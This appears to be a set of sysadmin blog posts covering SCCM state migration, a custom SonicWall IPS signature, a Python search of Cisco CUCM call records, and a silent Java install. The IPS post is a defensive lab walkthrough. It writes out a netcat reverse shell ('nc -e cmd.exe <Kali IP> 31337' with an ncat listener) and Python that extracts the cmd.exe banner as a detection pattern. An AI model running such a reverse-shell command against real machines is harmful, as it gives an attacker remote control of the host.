SCCM client doesn’t connect to the local SMP during OSD

I recently noticed that one of my computers was connecting to an SMP/DP across a T1 to a remote office to store user state during OSD. After reviewing the logs I saw that it was using the local DP for content, but not for user state storage.

I couldn’t find anything in the logs that explained this behavior, and I checked my boundaries and boundary groups and everything looked good. After failing to resolve this on my own over a few days, I opened a ticket with Microsoft support.

It turns out that while using boundaries to steer a client to the local DP is a feature, steering it to the local SMP is not: the client can use any writable SMP, even one across your slowest WAN link to a remote office.

You have two options to keep the client from sending user state across the WAN: check "Enable restore-only mode" in the State Migration Point properties under Administration > Servers and Site System Roles, or check "Capture locally by using links instead of copying files" in the "Capture User Files and Settings" step of your OSD task sequence.

Enabling restore-only mode prevents the SMP from accepting new user state, while state already stored on it remains available for restore. The problem with this approach is that not only will your other sites stop using that SMP to store user state, the local clients won't use it either, so they will send their user state across the WAN to another SMP. You may have to toggle this setting as needed; for example, if you are imaging several workstations in one office, you could enable restore-only mode on every SMP except the one at the site where the computers are being imaged.

Capturing locally by using links instead of copying files avoids having to remember to change SMP settings each time; it is a "set it and forget it" solution, which is what I prefer. Keep in mind that hard-link capture only works for refresh scenarios where the existing disk is kept; a replace scenario or a wiped disk still needs an SMP.

Creating custom SonicWall IPS signatures

I'm going to show how to use Kali Linux and a Windows 7 Pro VM running in VMware Workstation to create a packet capture from which to build a SonicWall IPS signature that detects a netcat reverse shell. Before writing this article I talked to SonicWall support and asked them whether the IPS signatures already detected netcat reverse shells, and was told that they do not. After creating this article, I discovered during testing that they actually do. This article is still a useful reference for creating custom IPS signatures in the future, so all is not wasted.

On your Kali VM, open a terminal and enter "ncat -l". This starts ncat listening for the reverse shell on its default port, 31337. You can specify a different port, for example "ncat -l 4444".

In Kali, start Wireshark, note the IP address of the interface you are capturing on, and start the capture.

In Windows, download netcat and unzip it to a directory of your choice. Open a cmd prompt and either cd to the directory where netcat was extracted or give its full path, then connect back to the Kali listener with: "nc -e cmd.exe <Kali IP> 31337"

On Kali, once the Windows 7 machine connects to the ncat listener you will see the Windows command prompt with the Windows version banner. Stop the Wireshark capture. In Wireshark, enter a display filter to find the right packet, "ip.src == <Windows IP>", and apply it.

Scroll down through the filtered frames until you find the one carrying the banner, that is, the frame whose TCP payload starts with "Microsoft Windows [Version ...":

Click File > Export Specified Packets, select "Selected packets only", and save it to your desktop.

I installed the Okteta hex editor in Kali with "apt-get install okteta". There is a command line hex editor already installed in Kali; however, I didn't want to take the time to learn a CLI hex editor since I had a deadline to get this done. I'll take the time to learn hexedit later.

Open Okteta and load the single-packet capture you saved earlier. Highlight only the banner bytes up to and including "Version 6.1." and leave out the directory path that follows, since the path varies from machine to machine. If you include anything beyond "Version 6.1." (the full build number, for example) you will need to edit the capture in your hex editor and export a copy for EVERY version of Windows that you need to protect.

Click File > Export > Values, clear the Separation field so the Preview shows the bytes without spaces, and click the "Export to File" button.
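The hex-editor steps above (pick the frame from the Windows host, keep only the banner bytes through "Version 6.1.", emit them as a hex string with no separators) can be done in a few lines of Python. The following is an added example, not code from the original post: it parses a classic libpcap file as Wireshark writes it, pulls the TCP payload from the first packet sent by the Windows IP that contains the banner, and returns the hex to paste into the match object. The banner text, IP addresses, MAC addresses and the one-frame capture it builds for itself are all constructed stand-ins.

```python
import socket
import struct

# Constructed Windows 7 cmd.exe banner as it crosses the wire in a netcat
# reverse shell. The prompt path at the end is the part that varies per host.
CMD_BANNER = (
    b"Microsoft Windows [Version 6.1.7601]\r\n"
    b"Copyright (c) 2009 Microsoft Corporation.  All rights reserved.\r\n\r\n"
    b"C:\\Users\\victim>"
)

# Stable prefix used for the match object: stop at "6.1." so the build number,
# copyright line and prompt path are not part of the signature.
SIGNATURE_PREFIX = b"Microsoft Windows [Version 6.1."

WINDOWS_IP = "192.168.56.101"   # constructed; the address you filtered ip.src on
KALI_IP = "192.168.56.102"      # constructed; the ncat listener


def build_pcap(payload, src_ip=WINDOWS_IP, dst_ip=KALI_IP,
               src_port=49152, dst_port=31337):
    """Build a one-frame libpcap file (Ethernet/IPv4/TCP) carrying payload.

    Constructed stand-in for the single packet Wireshark exports; checksums
    are left at zero because nothing here verifies them.
    """
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port, 1, 1,
                      5 << 4, 0x18, 8192, 0, 0) + payload
    total_len = 20 + len(tcp)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0x1234, 0, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip)) + tcp
    frame = (b"\x00\x0c\x29\x00\x00\x01" + b"\x00\x0c\x29\x00\x00\x02"
             + b"\x08\x00" + ip)
    global_hdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    rec_hdr = struct.pack("<IIII", 1415000000, 0, len(frame), len(frame))
    return global_hdr + rec_hdr + frame


def tcp_payloads(pcap):
    """Yield (src_ip, dst_ip, tcp_payload) for every IPv4/TCP frame in a
    libpcap file with Ethernet link type. Minimal parser, no reassembly."""
    magic = struct.unpack_from("<I", pcap, 0)[0]
    if magic == 0xA1B2C3D4:
        end = "<"
    elif magic == 0xD4C3B2A1:
        end = ">"
    else:
        raise ValueError("not a libpcap file (pcapng is not handled here)")
    linktype = struct.unpack_from(end + "I", pcap, 20)[0]
    if linktype != 1:
        raise ValueError("expected Ethernet link type")
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack_from(end + "IIII", pcap, off)
        off += 16
        frame = pcap[off:off + incl_len]
        off += incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue                      # not IPv4
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        if ip[9] != 6:
            continue                      # not TCP
        total_len = struct.unpack_from("!H", ip, 2)[0]
        tcp = ip[ihl:total_len]
        data_off = (tcp[12] >> 4) * 4
        yield (socket.inet_ntoa(ip[12:16]), socket.inet_ntoa(ip[16:20]),
               tcp[data_off:])


def signature_hex(pcap, src_ip, prefix=SIGNATURE_PREFIX):
    """Return the hex string to paste into the match object, taken from the
    first payload sent by src_ip that contains the banner prefix, else None."""
    for src, _dst, payload in tcp_payloads(pcap):
        if src != src_ip:
            continue
        idx = payload.find(prefix)
        if idx != -1:
            return payload[idx:idx + len(prefix)].hex()
    return None


if __name__ == "__main__":
    capture = build_pcap(CMD_BANNER)
    print(signature_hex(capture, WINDOWS_IP))
```

To use it on a real export, read the saved file with `open(path, "rb").read()` and pass it to `signature_hex` with the Windows IP. Newer Wireshark builds default to pcapng when exporting; pick the "Wireshark/tcpdump - pcap" format, or the parser above will refuse the file rather than guess.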

To add the new signature, you need to create a new "Match Object". In the SonicWall web interface, go to Firewall > Match Objects and click "Add New Match Object" at the bottom. Enter an object name (I used "Windows Reverse Shell"), set Match Object Type to "Custom Object", Match Type to "Exact Match" and Input Representation to "Hexadecimal", paste the hex string you exported from the hex editor, then click "Add" and "OK". Keep in mind that this matches the cleartext banner only: a shell tunnelled over TLS, or one that suppresses the banner, will not trigger it.

Create a new app rule:

Python script to search Cisco CUCM Call Detail Records

If you manage Cisco CUCM and get requests for Call Detail Records, you know how frustrating it can be to have to:
  1. import the CSV file into Excel
  2. delete all but 4 of the 60+ columns
  3. search thousands of rows of data to narrow it down to the one extension
  4. convert epoch time to something a human understands
The first time I had to fulfill a request for call records, it took me most of the day to figure it out. Before I wrote this script it took me an average of a couple of hours. That's two hours too long. With this script and Python installed, you can have a CSV file to import into Excel in seconds.
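The four steps above, as an added example in Python that is not the script from the original post: it reads the CDR export, skips the second header row of field types that CUCM writes under the column names, keeps only four columns, matches an extension against the calling, original-called and final-called parties (so forwarded calls are found too), converts the epoch fields to readable UTC timestamps, and writes a CSV ready for Excel. The column names are the standard CUCM CDR field names as far as I know; check them against your own export. The sample CDR text is constructed and has only a handful of the real columns.

```python
import csv
import io
from datetime import datetime, timezone

# Columns kept in the output. Standard CUCM CDR field names as far as I know;
# check them against the header row of your own export.
KEEP = ["callingPartyNumber", "finalCalledPartyNumber",
        "dateTimeOrigination", "duration"]
# CDR fields that hold epoch seconds (UTC).
TIME_FIELDS = {"dateTimeOrigination", "dateTimeConnect", "dateTimeDisconnect"}
# Fields an extension can appear in; searching all three catches forwarded calls.
PARTY_FIELDS = ("callingPartyNumber", "originalCalledPartyNumber",
                "finalCalledPartyNumber")

# Constructed sample with a handful of the 60+ real columns. CUCM exports put a
# second header row of field types under the column names; the script skips it.
SAMPLE_CDR = """\
cdrRecordType,globalCallID_callManagerId,callingPartyNumber,originalCalledPartyNumber,finalCalledPartyNumber,dateTimeOrigination,dateTimeConnect,dateTimeDisconnect,duration
INTEGER,INTEGER,VARCHAR(50),VARCHAR(50),VARCHAR(50),INTEGER,INTEGER,INTEGER,INTEGER
1,1,2001,2002,2002,1415000000,1415000003,1415000063,60
1,1,5551234567,2002,2005,1415000100,1415000105,1415000125,20
1,1,2003,2004,2004,1415000200,0,1415000210,0
"""


def epoch_to_text(value, tz=timezone.utc):
    """Render CDR epoch seconds as a readable timestamp. A value of 0 means the
    event never happened (for example dateTimeConnect on an unanswered call)."""
    secs = int(value)
    if secs == 0:
        return ""
    return datetime.fromtimestamp(secs, tz).strftime("%Y-%m-%d %H:%M:%S")


def search_cdr(text, extension, columns=KEEP, tz=timezone.utc):
    """Return the rows involving `extension`, reduced to `columns`, with the
    epoch fields converted. `text` is the full CDR CSV content."""
    results = []
    for row in csv.DictReader(io.StringIO(text)):
        if not row["dateTimeOrigination"].isdigit():
            continue                                  # the field-type row
        if extension not in (row[f] for f in PARTY_FIELDS):
            continue
        out = {}
        for col in columns:
            out[col] = (epoch_to_text(row[col], tz) if col in TIME_FIELDS
                        else row[col])
        results.append(out)
    return results


def to_csv(rows, columns=KEEP):
    """Serialise the reduced rows as CSV text ready to open in Excel."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=columns, lineterminator="\n")
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    # Usage: python cdr_search.py <cdr_export.csv> <extension> > result.csv
    with open(sys.argv[1], newline="") as fh:
        print(to_csv(search_cdr(fh.read(), sys.argv[2])), end="")
```

Times come out in UTC, which is how CUCM stores them; pass `tz=ZoneInfo("America/New_York")` (or your zone) to `search_cdr` if the requester wants local time, and add `dateTimeConnect` or `dateTimeDisconnect` to `KEEP` if they ask for answer or hang-up times.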

Deploying Java 8 update 25 with SCCM

Product: Java 8 Update 25 — Error 1722. There is a problem with this Windows Installer package. A program run as part of the setup did not finish as expected. Contact your support personnel or package vendor. Action installexe, location: C:\WINDOWS\Installer\MSI789B.tmp, command: /s INSTALLDIR="C:\Program Files (x86)\Java\jre1.8.0_25\" EULA=0 REPAIRMODE=0

Fix: Put this in your Installation program: msiexec /i jre1.8.0_25.msi JU=0 JAVAUPDATE=0 AUTOUPDATECHECK=0 RebootYesNo=No WEB_JAVA=1 /q (the JU, JAVAUPDATE and AUTOUPDATECHECK properties turn off the Java auto-updater, RebootYesNo=No suppresses the reboot prompt, WEB_JAVA=1 leaves the browser plugin enabled and /q runs the install silently).